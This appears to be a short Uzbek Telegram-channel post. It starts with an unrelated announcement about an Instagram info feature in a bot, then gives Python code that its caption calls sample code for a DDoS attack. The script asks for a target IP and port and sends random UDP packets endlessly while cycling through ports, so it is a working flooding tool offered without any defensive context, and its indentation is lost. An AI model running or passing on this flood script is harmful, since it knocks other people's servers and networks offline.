@puaroXbot da yani InstgramInfo bo'limi qo'shildi. Instagram hisob haqida ma'lumotlar olishingiz mumkin
Info API @CoderAbdulaziz tomonidan tuzilgan
import sys
import os
import time
import socket
import random
from datetime import datetime
#@ozodbekdevv
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
print()
ip = input(" IP Target : ")
port = int(input(" Port : "))
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print("Sent %s packet to %s throught port:%s"%(sent,ip,port))
if port == 65534:
port = 1
DDOS hujum uchun namuna kod
@uzcodingblog